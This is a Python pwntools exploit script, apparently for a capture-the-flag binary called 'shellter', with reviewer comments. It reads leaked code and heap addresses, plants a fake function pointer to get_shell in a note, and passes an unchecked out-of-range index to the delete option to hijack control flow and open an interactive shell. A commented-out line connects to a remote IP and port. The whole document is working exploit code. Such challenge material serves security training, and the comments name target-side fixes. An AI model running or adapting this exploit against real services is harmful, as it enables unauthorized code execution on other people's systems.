from pwn import *
# Tube to the target: by default the challenge binary is started locally.
r = process("./shellter")
# Disabled alternative: connect over TCP instead (presumably the hosted
# instance of the same challenge -- confirm before enabling).
#r = remote("51.15.73.163", 8088)
def menu():
    """Consume output up to and including the "choice > " prompt and return it."""
    banner = r.recvuntil("choice > ")
    return banner
def create(content):
    """Select menu option 1 and submit ``content`` as the note body.

    Returns the value the program prints between "Created at " and " !",
    parsed as a hexadecimal integer.
    """
    r.sendline("1")
    r.recvuntil("Enter content > ")
    # send(), not sendline(): the content goes out without a trailing newline.
    r.send(content)
    r.recvuntil("Created at ")
    reply = r.recvuntil(" !")
    # Drop the trailing " !" terminator before parsing the hex digits.
    hex_text = reply[:-2]
    return int(hex_text, 16)
def delete(index):
    """Select menu option 2 and send ``index`` as the note to delete."""
    r.sendline("2")
    r.recvuntil("delete note > ")
    index_text = str(index)
    r.sendline(index_text)
def help():
    """Select menu option 3 and return the address printed after "located at ".

    The rest of that output line is parsed as a hexadecimal integer.
    Note: this name shadows Python's builtin ``help``.
    """
    r.sendline("3")
    r.recvuntil("located at ")
    line = r.recvline()
    # Strip the trailing newline, then parse the remaining text as hex.
    return int(line[:-1], 16)
# Sync with the first menu prompt before sending anything.
menu()
# Option 3 prints an address; the script treats it as the help handler's
# address (per the variable name) and derives the other code addresses from it.
# NOTE(review): the target printing its own code and heap addresses is what
# makes every computation below possible -- those two disclosures are the
# first thing to remove on the target side.
help_func_addr = help()
# 0xc1a and 0xa30 are presumably the in-binary offsets of the help handler
# and of get_shell -- build specific, confirm against the binary under test.
get_shell_addr = help_func_addr - (0xc1a-0xa30)
info("get_shell: %s" % hex(get_shell_addr))
menu()
# First note: only the address reported for it is used.
chunk_addr = create("A"*8)
info("chunk_addr: %s" % hex(chunk_addr))
# Assumes the next note is placed 0x100 bytes after this one -- depends on
# the target's allocation size and allocator, TODO confirm.
next_chunk_addr = chunk_addr + 0x100
info("next_chunk: %s" % hex(next_chunk_addr))
menu()
# create a fake function pointer -> &get_shell
# The note body is two packed 64-bit values: next_chunk_addr+0x10 followed by
# get_shell_addr.
evil_chunk_addr = create(p64(next_chunk_addr+0x10) + p64(get_shell_addr))
menu()
# 0x201610 is presumably the distance from get_shell to the program's note
# table ("elems") -- build specific, TODO confirm.
elems_addr = get_shell_addr + 0x201610
# Index, counted in 8-byte slots from elems_addr, of the second 8-byte value
# (evil_chunk_addr + 0x8) of the note created above.
# NOTE(review): "/" is integer division only under Python 2; the result is
# passed through str() in delete(), so the script assumes a Python 2 interpreter.
# NOTE(review): this index presumably falls outside the note table, so the
# step relies on the delete option not range-checking its index; validating
# the index against the table size on the target side closes this path.
evil_index = ((evil_chunk_addr + 0x8) - elems_addr) / 8
delete(evil_index)
# Hand the session over to the terminal.
r.interactive()